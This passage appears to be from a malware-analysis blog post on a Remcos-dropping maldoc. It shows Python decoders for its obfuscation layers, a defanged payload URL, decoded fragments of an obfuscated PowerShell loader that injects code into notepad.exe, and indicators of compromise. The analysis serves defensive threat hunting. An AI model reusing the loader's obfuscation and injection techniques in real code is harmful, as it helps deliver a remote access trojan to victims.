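    PowerShell command and decode it (the command's own Split(' ') step)."""
    m = re.search(r"='((?:[0-9A-Fa-f]{2} ?)+)'", ps_cmd)
    if not m:
        raise ValueError("no spaced-hex literal in command")
    return decode_hex_tokens(m.group(1), " ")

# Three of the grep'd "&+:" strings from the listing above (Z10, Z11, jsd).
AMP_LINES = [
    "69&+:110&+:100&+:32&+:83&+:117&+:98",
    "87&+:83&+:99&+:114&+:105&+:112&+:116&+:46&+:81&+:117&+:105&+:116&+:40&+:41",
    "80&+:111&+:119&+:101&+:114&+:115&+:104&+:101&+:108&+:108",
]

# Constructed sample for the reversed layer: a harmless command written in
# the same shape as the real argument, stored reversed with spaces -> "#(:".
FORWARD = ("ExecutionPolicy Bypass $v='47 65 74 2D 44 61 74 65';"
           "$jm=$v.Split(' ')|forEach{[char]([convert]::toint16($_,16))};"
           "$jm -join ''|I`E`X")
SAMPLE_AIII = FORWARD[::-1].replace(" ", SEP)

# The opening characters of the real AiIi string, copied from the listing.
PAGE_HEAD = ("X`E`I|''#(:nioj-#(:mj$;}))61,_$(61tniot::]trevnoc[(]rahc[{#(:hcaErof"
             "#(:|#(:)'#(:'(tilpS.BOAfwsPxNuRGDZdNsktH$=mj$;'D4#(:C7#(:72#(:72#(:02#(:E6")

if __name__ == "__main__":
    for s in decode_amp_lines(AMP_LINES):
        print(s)
    print(decode_reversed_layer(PAGE_HEAD))
    print(extract_inner_hex(decode_reversed_layer(SAMPLE_AIII)))
```

Run against the full AiIi string from the listing, the same two calls (decode_reversed_layer, then extract_inner_hex) recover the command that Knmrerl hands to PowerShell and the hex it carries, so none of the layers needs to be executed to be read.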



The VBS script will then download: hxxp://185.172.110[.]217/robx/Attack.jpg

This file appears to contain a sequence of dash-separated, hex-encoded bytes. Let's convert, again with Python, and examine the head and tail:

In [67]: open("Attack.jpg").read()[:1024]
Out[67]: '66-75-6E-63-74-69-6F-6E-20-75-4F-58-43-64-6C-42-4B-20-7B-0D-0A-0D-0A-09-5B-43-6D-64-6C-65-74-42-69-6E-64-69-6E-67-28-29-5D-0D-0A-20-20-20-20-50-61-72-61-6D-20-28-5B-62-79-74-65-5B-5D-5D-20-24-4A-72-5A-4E-57-29-0D-0A-20-0D-0A-09-50-72-6F-63-65-73-73-20-7B-0D-0A-09-20-20-20-20-0D-0A-20-20-20-20-20-20-20-20-24-59-59-6B-47-20-3D-20-4E-65-77-2D-4F-62-6A-65-63-74-20-27-53-79-73-74-65-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-6D-6F-72-79-53-74-72-65-61-6D-27-2E-52-65-70-6C-61-63-65-28-27-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-27-2C-27-6D-2E-49-4F-2E-4D-65-27-29-20-28-20-2C-20-24-4A-72-5A-4E-57-20-29-0D-0A-09-20-20-20-20-24-6B-48-54-49-6C-44-52-63-20-3D-20-4E-65-77-2D-4F-62-6A-65-63-74-20-27-53-79-73-74-65-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-6D-6F-72-79-53-74-72-65-61-6D-27-2E-52-65-70-6C-61-63-65-28-27-21-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-3E-27-2C-27-6D-2E-49-4F-2E-4D-65-27-29-0D-0A-20-20-20-20-20-20-20-20-20-20-20-20-24-62-59-55-4E-5'

In [67]: data = bytes.fromhex(open("Attack.jpg").read().replace("-", ""))

In [69]: data[:1024]
Out[69]: b"function uOXCdlBK {\r\n\r\n\t[CmdletBinding()]\r\n    Param ([byte[]] $JrZNW)\r\n \r\n\tProcess {\r\n\t    \r\n        $YYkG = New-Object 'Syste!>>>>>>>>>>>>>>>>>>>moryStream'.Replace('!>>>>>>>>>>>>>>>>>>>','m.IO.Me') ( , $JrZNW )\r\n\t    $kHTIlDRc = New-Object 'Syste!>>>>>>>>>>>>>>>>>>>moryStream'.Replace('!>>>>>>>>>>>>>>>>>>>','m.IO.Me')\r\n            $bYUNS = New-Object 'System.I!>>>>>>>>>>>>>>>>>>>pStream'.Replace('!>>>>>>>>>>>>>>>>>>>','O.Compression.Gzi') $YYkG, ([IO.Compression.CompressionMode]::Decompress)\r\n\r\n    $ssnKgf = New-Object byte[](1024)\r\n    while($true){\r\n        $yGDi = $bYUNS.Read($ssnKgf, 0, 1024)\r\n        if ($yGDi -le 0){break}\r\n        $kHTIlDRc.Write($ssnKgf, 0, $yGDi)\r\n        }\r\n        \r\n        \r\n\t\t[byte[]] $prW = $kHTIlDRc.ToArray()\r\n        Write-Output $prW\r\n    }\r\n}\r\n\r\n$t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal g $t0;[Byte[]]$MNB=('<%1F,<%8B,<%08,<%00,<%00,<%00,<%00,<%00,<%04,<%00,<%EC,<%BA,<%79,<%3C,<%94,<%5F,<%F4,<%00,<%FC,<%CC,<%62,<%16"

In [70]: data[-1024:]
Out[70]: b"[...]replace('<%','0x'))| g\r\n\r\n  [Byte[]]$MNB22= uOXCdlBK $MNB2\r\n  [Mice]::YU('notepad.exe',$MNB22)\r\n  "



There are two encoded streams, MNB and MNB2, which we can extract again via Python:

In [128]: mnb = data[data.index(b"$MNB=('")+9:data.index(b"\'.replace")].replace(b",<%", b"")    
In [129]: mnb2 = data[data.index(b"$MNB2=(\'")+9:data.rindex(b"'.replace")].replace(b",<%", b"")
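Attack.jpg is a text file of dash-separated hex; once decoded it is a PowerShell script whose $MNB literal begins 1F 8B 08, the gzip magic, which matches the GzipStream decompressor in uOXCdlBK above. The Python below, an added example rather than code from the post, recovers the script, pulls every [Byte[]]$NAME=('<%..') literal by pattern instead of hand-counted offsets, checks the magic and decompresses. build_sample_attack_jpg constructs a stand-in input with a benign inner payload so the whole pipeline runs offline; the real file is processed the same way.

```python
import gzip
import re

GZIP_MAGIC = b"\x1f\x8b\x08"   # ID1, ID2, CM=deflate: the bytes $MNB starts with

def decode_dashed_hex(text: str) -> bytes:
    """'66-75-6E-...' -> bytes, the In [67] step."""
    return bytes.fromhex(text.strip().replace("-", ""))

# One "<%XX" per byte, comma separated; the script swaps "<%" for "0x" at run time.
STREAM_RE = re.compile(rb"\$(\w+)=\('((?:<%[0-9A-Fa-f]{2},?)+)'")

def extract_streams(ps_script: bytes) -> dict:
    """Return {name: raw bytes} for every byte-array literal in the script.
    Matching on the "<%" prefix avoids the hand-counted index()+9 slicing."""
    out = {}
    for m in STREAM_RE.finditer(ps_script):
        hexstr = m.group(2).replace(b"<%", b"").replace(b",", b"")
        out[m.group(1).decode()] = bytes.fromhex(hexstr.decode())
    return out

def unwrap(blob: bytes) -> bytes:
    """Mirror uOXCdlBK (GzipStream, Decompress). Check the magic first so a
    truncated or unrelated stream fails loudly rather than deep inside zlib."""
    if not blob.startswith(GZIP_MAGIC):
        raise ValueError("not a gzip stream, starts with %r" % blob[:4])
    return gzip.decompress(blob)

def recover_payload(dashed_text: str, name: str = "MNB") -> bytes:
    """Full pipeline: dashed hex -> script -> named literal -> decompressed bytes."""
    return unwrap(extract_streams(decode_dashed_hex(dashed_text))[name])

def build_sample_attack_jpg():
    """Constructed stand-in for Attack.jpg: a benign inner payload, gzip'd,
    written as a "<%XX" list inside a dash-hex encoded script. Returns the
    encoded text and the payload it should decode back to."""
    inner = b"Write-Output 'constructed inner payload'"
    literal = b",".join(b"<%%%02X" % b for b in gzip.compress(inner))
    script = (b"[Byte[]]$MNB=('" + literal + b"'.replace('<%','0x'))| g\r\n"
              b"[Byte[]]$MNB2=('<%00,<%01'.replace('<%','0x'))| g\r\n")
    return "-".join("%02X" % b for b in script), inner

if __name__ == "__main__":
    dashed, inner = build_sample_attack_jpg()
    print(decode_dashed_hex(dashed)[:40])
    print(recover_payload(dashed) == inner)
```

The magic check is the useful part when working on a real sample: if the extracted bytes do not start with 1F 8B the literal was cut at the wrong place, and that is worth knowing before feeding the output to anything else.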



The PowerShell is responsible for launching the innocuous notepad.exe and then modifying its process memory with the malicious payload. Once loaded, the following mutex is created, indicating the presence of Remcos:

Remcos_Mutex_Inj

Indicators

Date Observed   Indicator Type   Indicator
7/9/2020        DOCX Document    41c99b18ea6e24259573bd82c3fa967ea47fc204afd770bbfadfff42862ca528
7/9/2020        DOTM Document    0892656183c07a099887cd0ad837f05d17cd77a8d253f3e8b637bc099c3bcb0b
7/9/2020        Domain Name      r0lls-r0yce.com
7/9/2020        IP Address       185.172.110.217 (AS206898, NL, BLADESERVERS)

Malware Samples

Remcos

Tags
Maldoc Remcos Remote Access Trojan Threat Hunting